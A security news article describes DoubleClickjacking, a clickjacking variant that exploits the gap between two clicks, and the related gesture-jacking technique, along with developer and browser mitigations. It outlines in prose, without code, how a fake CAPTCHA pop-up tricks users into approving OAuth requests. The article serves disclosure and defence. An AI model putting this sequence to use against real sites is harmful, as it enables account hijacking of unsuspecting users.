DoubleClickjacking Exploit
Threat analysts have uncovered a newly identified class of timing-based vulnerabilities that exploits a double-click sequence to enable clickjacking attacks and unauthorized account access across numerous significant websites. This technique, dubbed DoubleClickjacking, introduces a novel approach to UI manipulation that circumvents existing security measures.
Table of Contents
A New Approach to Clickjacking
Unlike traditional clickjacking methods that rely on a single user click, DoubleClickjacking leverages the brief delay between two consecutive clicks. While this may seem like a minor shift, it effectively bypasses protections such as the X-Frame-Options header and SameSite: Lax/Strict cookie settings.
Clickjacking, also known as UI redressing, deceives users into interacting with elements they perceive as harmless—such as buttons—only to trigger unintended actions, including data exfiltration or security breaches. DoubleClickjacking refines this concept by exploiting the interval between clicks, allowing attackers to override security controls and hijack accounts with minimal user involvement.
How the Attack Works
The technique unfolds in the following sequence:
- A user visits a fraudulent website that either opens a new browser tab automatically or prompts them to do so.
- This new window, which may appear as a routine CAPTCHA verification, instructs the user to double-click.
- As the double-click occurs, the original site stealthily redirects to a malicious page—such as an OAuth authorization request.
- Simultaneously, the pop-up window closes, leading the user to approve a critical permission request on the original site unknowingly.
Since most Web security defenses are designed to counteract only single forced clicks, this method effectively bypasses conventional safeguards. Measures such as X-Frame-Options, SameSite cookies, and Content Security Policy (CSP) cannot mitigate this threat.
Preventative Measures and Long-Term Solutions
To address this issue, website developers can implement client-side protections that disable essential action buttons unless a user-initiated mouse movement or keypress is detected. Some platforms, including Dropbox, already employ such defensive mechanisms to prevent unauthorized interactions.
As a long-term solution, security experts recommend that browser vendors establish new standards akin to X-Frame-Options to mitigate double-click-based attacks effectively.
A New Twist on Clickjacking
DoubleClickjacking is an evolution of well-documented clickjacking techniques, exploiting subtle timing gaps between user actions to swap legitimate UI elements with deceptive ones in an instant.
This disclosure follows an earlier revelation of cross-window forgery (gesture-jacking), another clickjacking variant. That technique persuades users to press or hold keys like Enter or Space on a compromised site, initiating unintended actions.
On platforms such as Coinbase and Yahoo!, attackers could leverage gesture-jacking to hijack accounts. If a logged-in user visits an unsafe website and presses Enter or Space, they could unknowingly authorize a rogue OAuth application. This is possible because both platforms allow OAuth applications to request broad access and assign predictable, static identifiers to authorization buttons, making them susceptible to exploitation.
As clickjacking methods continue to evolve, security teams must adopt proactive defenses to safeguard user interactions from increasingly sophisticated threats.